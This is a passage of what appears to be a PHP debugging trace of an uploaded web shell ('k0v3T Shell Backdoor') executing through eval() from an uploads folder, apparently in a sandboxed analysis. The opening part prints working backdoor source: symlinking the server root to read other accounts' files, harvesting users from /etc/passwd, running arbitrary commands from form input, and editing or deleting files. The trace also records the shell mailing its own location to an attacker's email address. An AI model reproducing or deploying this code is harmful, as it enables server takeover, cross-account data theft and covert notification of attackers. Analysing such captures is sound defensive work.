";\r\n}else{\r\n$TEST=@file(\'/etc/passwd\');\r\nif ($TEST){\r\n@mkdir("k0v3T_sym",0777);\r\n@chdir("k0v3T_sym");\r\nexe("ln -s / root");\r\n$file3 = \'Options Indexes FollowSymLinks\r\nDirectoryIndex k0v3T.htm\r\nAddType text/plain .php\r\nAddHandler text/plain .php\r\nSatisfy Any\';\r\n $fp3 = fopen(\'.htaccess\',\'w\');\r\n $fw3 = fwrite($fp3,$file3);\r\n @fclose($fp3);\r\n echo "\r\n \r\n \r\n \r\n ";\r\n $dcount = 1;\r\n $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");\r\n while(!feof($file)){\r\n $s = fgets($file);\r\n $matches = array();\r\n $t = preg_match(\'/\\/(.*?)\\:\\//s\', $s, $matches);\r\n $matches = str_replace("home/","",$matches[1]);\r\n if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")\r\n continue;\r\n echo "\r\n ";\r\n echo "";\r\n $dcount++;}fclose($file);\r\n echo "
S. No.UsersSymlink
" . $dcount . "" . $matches . "Symlink
";}else{if($os != "Windows"){@mkdir("k0v3T_sym",0777);@chdir("k0v3T_sym");@exe("ln -s / root");$file3 = \'\r\n Options Indexes FollowSymLinks\r\nDirectoryIndex k0v3T.htm\r\nAddType text/plain .php\r\nAddHandler text/plain .php\r\nSatisfy Any\r\n\';\r\n $fp3 = fopen(\'.htaccess\',\'w\');\r\n $fw3 = fwrite($fp3,$file3);@fclose($fp3);\r\n echo "\r\n

server symlinker

\r\n \r\n \r\n \r\n ";\r\n $temp = "";$val1 = 0;$val2 = 1000;\r\n for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);\r\n if ($uid)$temp .= join(\':\',$uid)."\\n";}\r\n echo \'
\';$temp = trim($temp);$file5 =\r\n fopen("test.txt","w");\r\n fputs($file5,$temp);\r\n fclose($file5);$dcount = 1;$file =\r\n fopen("test.txt", "r") or exit("Unable to open file!");\r\n while(!feof($file)){$s = fgets($file);$matches = array();\r\n $t = preg_match(\'/\\/(.*?)\\:\\//s\', $s, $matches);$matches = str_replace("home/","",$matches[1]);\r\n if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")\r\n continue;\r\n echo "\r\n ";\r\n echo "";\r\n $dcount++;}\r\n fclose($file);\r\n echo "
IDUsersSymlink
" . $dcount . "" . $matches . "Symlink
";unlink("test.txt");\r\n } else\r\n echo "
Cannot create Symlink
";\r\n }\r\n }\r\n##JUMPING \r\n} elseif($_GET[\'a\'] == \'jumping\') {\r\n $i = 0;\r\n echo "
";\r\n    $etc = fopen("/etc/passwd", "r") or die("Can\'t read /etc/passwd");\r\n    while($passwd = fgets($etc)) {\r\nif($passwd == \'\' || !$etc) {\r\n    echo "Can\'t read /etc/passwd";\r\n} else {\r\n    preg_match_all(\'/(.*?):x:/\', $passwd, $user_jumping);\r\n    foreach($user_jumping[1] as $user_idx_jump) {\r\n        $user_jumping_dir = "/home/$user_idx_jump/public_html";\r\n        if(is_readable($user_jumping_dir)) {\r\n            $i++;\r\n            $jrw = "[R] $user_jumping_dir";\r\n            if(is_writable($user_jumping_dir)) {\r\n                $jrw = "[RW] $user_jumping_dir";\r\n            }\r\n            echo $jrw;\r\n            if(function_exists(\'posix_getpwuid\')) {\r\n                $domain_jump = file_get_contents("/etc/named.conf");   \r\n                if($domain_jump == \'\') {\r\n                    echo " => ( gagal mengambil nama domain nya )
";\r\n                } else {\r\n                    preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);\r\n                    foreach($domains_jump[1] as $dj) {\r\n                        $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));\r\n                        $user_jumping_url = $user_jumping_url[\'name\'];\r\n                        if($user_jumping_url == $user_idx_jump) {\r\n                            echo " => ( $dj )
";\r\n                            break;\r\n                        }\r\n                    }\r\n                }\r\n            } else {\r\n                echo "
";\r\n            }\r\n        }\r\n    }\r\n}\r\n    }\r\n    if($i == 0) {\r\n    } else {\r\necho "
Total ada ".$i." Kamar di ".gethostbyname($_SERVER[\'HTTP_HOST\'])."";\r\n    \r\n    echo "
";\r\n\t\t}\r\n\r\n\r\n\r\n//CONFIG\r\n\r\n} elseif($_GET[\'a\'] == \'cmd\') {\r\n\techo "
\r\n\t".$user."@".$ip.": ~ $ \r\n\t>\'>\r\n\t
";\r\n\tif($_POST[\'do_cmd\']) {\r\n\t\techo "
".exe($_POST[\'cmd\'])."
";\r\n\t}\r\n\r\n//START\r\n} elseif(isset($_GET[\'filesrc\'])){\r\necho "Current File : ";\r\necho $_GET[\'filesrc\'];\r\necho \'
\';\r\necho(\'
\');\r\n}elseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\necho \'
\'.$_POST[\'path\'].\'

\';\r\nif($_POST[\'opt\'] == \'chmod\'){\r\nif(isset($_POST[\'perm\'])){\r\nif(chmod($_POST[\'path\'],$_POST[\'perm\'])){\r\necho \'Ganti Permission Berhasil Gan
\';\r\n}else{\r\necho \'Ganti Permission Gagal Gan
\';\r\n}\r\n}\r\necho \'
\r\nPermission : \r\n\r\n\r\n\r\n
\';\r\n}elseif($_POST[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'Ganti Nama Berhasil Gan
\';\r\n}else{\r\necho \'Ganti Nama Gagal Gan
\';\r\n}\r\n$_POST[\'name\'] = $_POST[\'newname\'];\r\n}\r\necho \'
\r\nNama Baru : \r\n\r\n\r\n\r\n
\';\r\n}elseif($_POST[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'Edit File Berhasil Gan
\';\r\n}else{\r\necho \'Edit File Gagal Gan
\';\r\n}\r\nfclose($fp);\r\n}\r\necho \'
\r\n
\r\n\r\n\r\n\r\n
\';\r\n}\r\necho \'\';\r\n}else{\r\necho \'
\';\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\nif($_POST[\'type\'] == \'dir\'){\r\nif(rmdir($_POST[\'path\'])){\r\necho \'Hapus Dir Berhasil Gan
\';\r\n}else{\r\necho \'Hapus Dir Gagal Gan
\';\r\n}\r\n}elseif($_POST[\'type\'] == \'file\'){\r\nif(unlink($_POST[\'path\'])){\r\necho \'Hapus File Berhasil Gan
\';\r\n}else{\r\necho \'Hapus File Gagal Gan
\';\r\n}\r\n}\r\n}\r\n\t\t\r\necho \'
\';\r\n$scandir = scandir($path);\r\necho \'
\r\n\r\n\r\n\r\n\r\n\r\n\';\r\n\r\nforeach($scandir as $dir){\r\nif(!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\') continue;\r\necho "\r\n\r\n\r\n\r\n";\r\n}\r\necho \'\';\r\nforeach($scandir as $file){\r\nif(!is_file("$path/$file")) continue;\r\n$size = filesize("$path/$file")/1024;\r\n$size = round($size,3);\r\nif($size >= 1024){\r\n$size = round($size/1024,2).\' MB\';\r\n}else{\r\n$size = $size.\' KB\';\r\n}\r\n\r\necho "\r\n\r\n\r\n\r\n\r\n";\r\n}\r\necho \'
Name
Size
Permissions
Options
\r\n$dir
Directory
";\r\n\t\r\nif(is_writable("$path/$dir")) echo \'\';\r\nelseif(!is_readable("$path/$dir")) echo \'\';\r\necho perms("$path/$dir");\r\nif(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo \'\';\r\n\r\necho "
\r\n\r\n\r\n\r\n\r\n\\" />\r\n
\r\n$file
".$size."
";\r\nif(is_writable("$path/$file")) echo \'\';\r\nelseif(!is_readable("$path/$file")) echo \'\';\r\necho perms("$path/$file");\r\nif(is_writable("$path/$file") || !is_readable("$path/$file")) echo \'\';\r\necho "
\r\n\r\n\r\n\r\n\r\n\\" />\r\n
\r\n
\';\r\n}\r\necho \'
k0v3T Shell Backdoor V.01
Copyright © Indonesian Hacker Community
\r\n\r\n\r\n\';\r\nfunction perms($file){\r\n$perms = fileperms($file);\r\n\r\nif (($perms & 0xC000) == 0xC000) {\r\n// Socket\r\n$info = \'s\';\r\n} elseif (($perms & 0xA000) == 0xA000) {\r\n// Symbolic Link\r\n$info = \'l\';\r\n} elseif (($perms & 0x8000) == 0x8000) {\r\n// Regular\r\n$info = \'-\';\r\n} elseif (($perms & 0x6000) == 0x6000) {\r\n// Block special\r\n$info = \'b\';\r\n} elseif (($perms & 0x4000) == 0x4000) {\r\n// Directory\r\n$info = \'d\';\r\n} elseif (($perms & 0x2000) == 0x2000) {\r\n// Character special\r\n$info = \'c\';\r\n} elseif (($perms & 0x1000) == 0x1000) {\r\n// FIFO pipe\r\n$info = \'p\';\r\n} else {\r\n// Unknown\r\n$info = \'u\';\r\n}\r\n\r\n// Owner\r\n$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0040) ?\r\n(($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0800) ? \'S\' : \'-\'));\r\n\r\n// Group\r\n$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0008) ?\r\n(($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0400) ? \'S\' : \'-\'));\r\n\r\n// World\r\n$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0001) ?\r\n(($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n(($perms & 0x0200) ? \'T\' : \'-\'));\r\n\r\nreturn $info;\r\n}' /var/www/html/uploads/titit.php 89 0 3 6 0 0.002426 707568 ini_set 0 /var/www/html/uploads/titit.php(89) : eval()'d code 1 2 'output_buffering' 0 3 6 1 0.002446 707640 3 6 R FALSE 3 7 0 0.002461 707568 ini_set 0 /var/www/html/uploads/titit.php(89) : eval()'d code 2 2 'display_errors' 0 3 7 1 0.002476 707640 3 7 R '' 3 8 0 0.002490 707568 set_time_limit 0 /var/www/html/uploads/titit.php(89) : eval()'d code 3 1 0 3 8 1 0.002506 707632 3 8 R FALSE 3 9 0 0.002519 707600 ini_set 0 /var/www/html/uploads/titit.php(89) : eval()'d code 4 2 'memory_limit' '64M' 3 9 1 0.002535 707704 3 9 R '128M' 3 10 0 0.002548 707600 header 0 /var/www/html/uploads/titit.php(89) : eval()'d code 5 1 'Content-Type: text/html; charset=UTF-8' 3 10 1 0.002566 707776 3 10 R NULL 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 6 $tujuanmail = 'satyaaji1945@gmail.com' 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 7 $x_path = 'http://localhost/uploads/titit.php' 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 8 $pesan_alert = 'fix http://localhost/uploads/titit.php :p *IP Address : [ 127.0.0.1 ]' 3 11 0 0.002624 707944 mail 0 /var/www/html/uploads/titit.php(89) : eval()'d code 9 4 'satyaaji1945@gmail.com' 'LOGGER' 'fix http://localhost/uploads/titit.php :p *IP Address : [ 127.0.0.1 ]' '[ 127.0.0.1 ]' 3 11 1 0.003349 708088 3 11 R FALSE 3 12 0 0.003371 707904 set_time_limit 0 /var/www/html/uploads/titit.php(89) : eval()'d code 10 1 0 3 12 1 0.003387 707936 3 12 R FALSE 3 13 0 0.003400 707904 error_reporting 0 /var/www/html/uploads/titit.php(89) : eval()'d code 11 1 0 3 13 1 0.003414 707944 3 13 R 22527 3 14 0 0.003427 707904 get_magic_quotes_gpc 0 /var/www/html/uploads/titit.php(89) : eval()'d code 22 0 3 14 1 0.003441 707904 3 14 R FALSE 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 55 $nick = 'k0v3T' 3 15 0 0.003467 707904 getcwd 0 /var/www/html/uploads/titit.php(89) : eval()'d code 59 0 3 15 1 0.003486 707952 3 15 R '/var/www/html/uploads' 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 59 $path = '/var/www/html/uploads' 3 16 0 0.003519 707952 getenv 0 /var/www/html/uploads/titit.php(89) : eval()'d code 61 1 'SERVER_SOFTWARE' 3 16 1 0.003536 708032 3 16 R 'Apache/2.4.52 (Ubuntu)' 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 61 $software = 'Apache/2.4.52 (Ubuntu)' 3 17 0 0.003564 708000 str_replace 0 /var/www/html/uploads/titit.php(89) : eval()'d code 62 3 '\\' '/' '/var/www/html/uploads' 3 17 1 0.003580 708096 3 17 R '/var/www/html/uploads' 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 62 $path = '/var/www/html/uploads' 3 18 0 0.003606 708000 explode 0 /var/www/html/uploads/titit.php(89) : eval()'d code 63 2 '/' '/var/www/html/uploads' 3 18 1 0.003622 708576 3 18 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads'] 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 63 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads'] 3 19 0 0.003657 708504 function_exists 0 /var/www/html/uploads/titit.php(89) : eval()'d code 68 1 'posix_getegid' 3 19 1 0.003671 708544 3 19 R TRUE 3 20 0 0.003684 708504 posix_geteuid 0 /var/www/html/uploads/titit.php(89) : eval()'d code 74 0 3 20 1 0.003698 708504 3 20 R 33 3 21 0 0.003711 708504 posix_getpwuid 0 /var/www/html/uploads/titit.php(89) : eval()'d code 74 1 33 3 21 1 0.003742 709336 3 21 R ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin'] 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 74 $uid = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin'] 3 22 0 0.003787 709304 posix_getegid 0 /var/www/html/uploads/titit.php(89) : eval()'d code 75 0 3 22 1 0.003800 709304 3 22 R 33 3 23 0 0.003812 709304 posix_getgrgid 0 /var/www/html/uploads/titit.php(89) : eval()'d code 75 1 33 3 23 1 0.003839 709968 3 23 R ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33] 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 75 $gid = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33] 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 76 $user = 'www-data' 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 77 $uid = 33 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 78 $group = 'www-data' 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 79 $gid = 33 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 83 $id = 0 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 85 $a = TRUE 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 83 $id = 1 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i = 0 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 83 $id = 2 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i = 0 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 83 $id = 3 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i = 0 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 83 $id = 4 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i = 0 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i++ 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 91 $i++ 3 24 0 0.004152 708584 scandir 0 /var/www/html/uploads/titit.php(89) : eval()'d code 723 1 '/var/www/html/uploads' 3 24 1 0.004186 709208 3 24 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'titit.php'] 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 723 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'titit.php'] 3 25 0 0.004227 709224 is_dir 0 /var/www/html/uploads/titit.php(89) : eval()'d code 733 1 '/var/www/html/uploads/.' 3 25 1 0.004244 709288 3 25 R TRUE 3 26 0 0.004258 709256 is_dir 0 /var/www/html/uploads/titit.php(89) : eval()'d code 733 1 '/var/www/html/uploads/..' 3 26 1 0.004274 709304 3 26 R TRUE 3 27 0 0.004288 709264 is_dir 0 /var/www/html/uploads/titit.php(89) : eval()'d code 733 1 '/var/www/html/uploads/.htaccess' 3 27 1 0.004303 709304 3 27 R FALSE 3 28 0 0.004317 709264 is_dir 0 /var/www/html/uploads/titit.php(89) : eval()'d code 733 1 '/var/www/html/uploads/data' 3 28 1 0.004332 709304 3 28 R TRUE 3 29 0 0.004346 709264 is_writable 0 /var/www/html/uploads/titit.php(89) : eval()'d code 739 1 '/var/www/html/uploads/data' 3 29 1 0.004364 709304 3 29 R TRUE 3 30 0 0.004378 709264 perms 1 /var/www/html/uploads/titit.php(89) : eval()'d code 741 1 '/var/www/html/uploads/data' 4 31 0 0.004392 709264 fileperms 0 /var/www/html/uploads/titit.php(89) : eval()'d code 803 1 '/var/www/html/uploads/data' 4 31 1 0.004405 709304 4 31 R 16895 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 803 $perms = 16895 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 819 $info = 'd' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 832 $info .= 'r' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 833 $info .= 'w' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 836 $info .= 'x' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 839 $info .= 'r' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 840 $info .= 'w' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 843 $info .= 'x' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 846 $info .= 'r' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 847 $info .= 'w' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 850 $info .= 'x' 3 30 1 0.004534 709304 3 30 R 'drwxrwxrwx' 3 32 0 0.004548 709264 is_writable 0 /var/www/html/uploads/titit.php(89) : eval()'d code 742 1 '/var/www/html/uploads/data' 3 32 1 0.004565 709304 3 32 R TRUE 3 33 0 0.004584 709240 is_dir 0 /var/www/html/uploads/titit.php(89) : eval()'d code 733 1 '/var/www/html/uploads/prepend.php' 3 33 1 0.004601 709288 3 33 R FALSE 3 34 0 0.004615 709240 is_dir 0 /var/www/html/uploads/titit.php(89) : eval()'d code 733 1 '/var/www/html/uploads/titit.php' 3 34 1 0.004630 709272 3 34 R FALSE 3 35 0 0.004645 709224 is_file 0 /var/www/html/uploads/titit.php(89) : eval()'d code 761 1 '/var/www/html/uploads/.' 3 35 1 0.004660 709256 3 35 R FALSE 3 36 0 0.004674 709224 is_file 0 /var/www/html/uploads/titit.php(89) : eval()'d code 761 1 '/var/www/html/uploads/..' 3 36 1 0.004688 709272 3 36 R FALSE 3 37 0 0.004702 709232 is_file 0 /var/www/html/uploads/titit.php(89) : eval()'d code 761 1 '/var/www/html/uploads/.htaccess' 3 37 1 0.004717 709272 3 37 R TRUE 3 38 0 0.004730 709232 filesize 0 /var/www/html/uploads/titit.php(89) : eval()'d code 762 1 '/var/www/html/uploads/.htaccess' 3 38 1 0.004753 709272 3 38 R 64 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 762 $size = 0.0625 3 39 0 0.004779 709176 round 0 /var/www/html/uploads/titit.php(89) : eval()'d code 763 2 0.0625 3 3 39 1 0.004794 709248 3 39 R 0.063 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 763 $size = 0.063 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 767 $size = '0.063 KB' 3 40 0 0.004832 709272 is_writable 0 /var/www/html/uploads/titit.php(89) : eval()'d code 775 1 '/var/www/html/uploads/.htaccess' 3 40 1 0.004849 709312 3 40 R FALSE 3 41 0 0.004866 709272 is_readable 0 /var/www/html/uploads/titit.php(89) : eval()'d code 776 1 '/var/www/html/uploads/.htaccess' 3 41 1 0.004882 709312 3 41 R TRUE 3 42 0 0.004895 709272 perms 1 /var/www/html/uploads/titit.php(89) : eval()'d code 777 1 '/var/www/html/uploads/.htaccess' 4 43 0 0.004909 709272 fileperms 0 /var/www/html/uploads/titit.php(89) : eval()'d code 803 1 '/var/www/html/uploads/.htaccess' 4 43 1 0.004922 709312 4 43 R 33188 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 803 $perms = 33188 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 813 $info = '-' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 832 $info .= 'r' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 833 $info .= 'w' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 836 $info .= '-' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 839 $info .= 'r' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 840 $info .= '-' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 843 $info .= '-' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 846 $info .= 'r' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 847 $info .= '-' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 850 $info .= '-' 3 42 1 0.005055 709312 3 42 R '-rw-r--r--' 3 44 0 0.005070 709272 is_writable 0 /var/www/html/uploads/titit.php(89) : eval()'d code 778 1 '/var/www/html/uploads/.htaccess' 3 44 1 0.005087 709312 3 44 R FALSE 3 45 0 0.005101 709272 is_readable 0 /var/www/html/uploads/titit.php(89) : eval()'d code 778 1 '/var/www/html/uploads/.htaccess' 3 45 1 0.005117 709312 3 45 R TRUE 3 46 0 0.005131 709272 is_file 0 /var/www/html/uploads/titit.php(89) : eval()'d code 761 1 '/var/www/html/uploads/data' 3 46 1 0.005147 709312 3 46 R FALSE 3 47 0 0.005161 709280 is_file 0 /var/www/html/uploads/titit.php(89) : eval()'d code 761 1 '/var/www/html/uploads/prepend.php' 3 47 1 0.005177 709328 3 47 R TRUE 3 48 0 0.005190 709288 filesize 0 /var/www/html/uploads/titit.php(89) : eval()'d code 762 1 '/var/www/html/uploads/prepend.php' 3 48 1 0.005204 709328 3 48 R 57 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 762 $size = 0.0556640625 3 49 0 0.005229 709184 round 0 /var/www/html/uploads/titit.php(89) : eval()'d code 763 2 0.0556640625 3 3 49 1 0.005253 709256 3 49 R 0.056 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 763 $size = 0.056 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 767 $size = '0.056 KB' 3 50 0 0.005292 709288 is_writable 0 /var/www/html/uploads/titit.php(89) : eval()'d code 775 1 '/var/www/html/uploads/prepend.php' 3 50 1 0.005310 709328 3 50 R FALSE 3 51 0 0.005323 709288 is_readable 0 /var/www/html/uploads/titit.php(89) : eval()'d code 776 1 '/var/www/html/uploads/prepend.php' 3 51 1 0.005339 709328 3 51 R TRUE 3 52 0 0.005352 709288 perms 1 /var/www/html/uploads/titit.php(89) : eval()'d code 777 1 '/var/www/html/uploads/prepend.php' 4 53 0 0.005366 709288 fileperms 0 /var/www/html/uploads/titit.php(89) : eval()'d code 803 1 '/var/www/html/uploads/prepend.php' 4 53 1 0.005380 709328 4 53 R 33261 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 803 $perms = 33261 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 813 $info = '-' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 832 $info .= 'r' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 833 $info .= 'w' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 836 $info .= 'x' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 839 $info .= 'r' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 840 $info .= '-' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 843 $info .= 'x' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 846 $info .= 'r' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 847 $info .= '-' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 850 $info .= 'x' 3 52 1 0.005507 709328 3 52 R '-rwxr-xr-x' 3 54 0 0.005521 709288 is_writable 0 /var/www/html/uploads/titit.php(89) : eval()'d code 778 1 '/var/www/html/uploads/prepend.php' 3 54 1 0.005542 709328 3 54 R FALSE 3 55 0 0.005556 709288 is_readable 0 /var/www/html/uploads/titit.php(89) : eval()'d code 778 1 '/var/www/html/uploads/prepend.php' 3 55 1 0.005573 709328 3 55 R TRUE 3 56 0 0.005586 709280 is_file 0 /var/www/html/uploads/titit.php(89) : eval()'d code 761 1 '/var/www/html/uploads/titit.php' 3 56 1 0.005602 709312 3 56 R TRUE 3 57 0 0.005615 709272 filesize 0 /var/www/html/uploads/titit.php(89) : eval()'d code 762 1 '/var/www/html/uploads/titit.php' 3 57 1 0.005629 709312 3 57 R 54046 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 762 $size = 52.779296875 3 58 0 0.005654 709176 round 0 /var/www/html/uploads/titit.php(89) : eval()'d code 763 2 52.779296875 3 3 58 1 0.005668 709248 3 58 R 52.779 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 763 $size = 52.779 2 A /var/www/html/uploads/titit.php(89) : eval()'d code 767 $size = '52.779 KB' 3 59 0 0.005799 709272 is_writable 0 /var/www/html/uploads/titit.php(89) : eval()'d code 775 1 '/var/www/html/uploads/titit.php' 3 59 1 0.005818 709312 3 59 R FALSE 3 60 0 0.005831 709272 is_readable 0 /var/www/html/uploads/titit.php(89) : eval()'d code 776 1 '/var/www/html/uploads/titit.php' 3 60 1 0.005847 709312 3 60 R TRUE 3 61 0 0.005861 709272 perms 1 /var/www/html/uploads/titit.php(89) : eval()'d code 777 1 '/var/www/html/uploads/titit.php' 4 62 0 0.005874 709272 fileperms 0 /var/www/html/uploads/titit.php(89) : eval()'d code 803 1 '/var/www/html/uploads/titit.php' 4 62 1 0.005888 709312 4 62 R 33204 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 803 $perms = 33204 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 813 $info = '-' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 832 $info .= 'r' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 833 $info .= 'w' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 836 $info .= '-' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 839 $info .= 'r' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 840 $info .= 'w' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 843 $info .= '-' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 846 $info .= 'r' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 847 $info .= '-' 3 A /var/www/html/uploads/titit.php(89) : eval()'d code 850 $info .= '-' 3 61 1 0.006014 709312 3 61 R '-rw-rw-r--' 3 63 0 0.006029 709272 is_writable 0 /var/www/html/uploads/titit.php(89) : eval()'d code 778 1 '/var/www/html/uploads/titit.php' 3 63 1 0.006048 709312 3 63 R FALSE 3 64 0 0.006062 709272 is_readable 0 /var/www/html/uploads/titit.php(89) : eval()'d code 778 1 '/var/www/html/uploads/titit.php' 3 64 1 0.006099 709312 3 64 R TRUE 2 5 1 0.006117 709216 1 3 1 0.006150 518496 0.006185 436216 TRACE END [2023-02-12 20:21:07.295885]